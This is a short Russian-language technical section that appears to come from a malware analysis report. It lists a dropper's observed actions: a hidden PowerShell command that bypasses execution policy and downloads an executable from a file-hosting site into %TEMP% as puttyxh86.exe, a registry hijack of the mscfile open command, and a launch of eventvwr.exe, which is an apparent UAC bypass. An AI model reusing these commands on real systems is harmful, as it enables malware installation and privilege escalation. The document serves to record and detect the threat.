Техническая информация
- [HKCU\Software\Classes\mscfile\shell\open\command] '' = '%TEMP%\puttyxh86.exe'
- https://a.pomf.cat/bbuqjb.exe как %temp%\puttyxh86.exe
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/bbuqjb.exe','%TEMP%\puttyxh86.exe') & reg add HKCU\Software\Classes\mscfil...
- 'a.##mf.cat':443
- 'a.##mf.cat':443
- DNS ASK a.##mf.cat
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/bbuqjb.exe','%TEMP%\puttyxh86.exe') & reg add HKCU\Software\Classes\mscfil...' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\mscfile\shell\open\command /d %TEMP%\puttyxh86.exe /f
- '<SYSTEM32>\eventvwr.exe'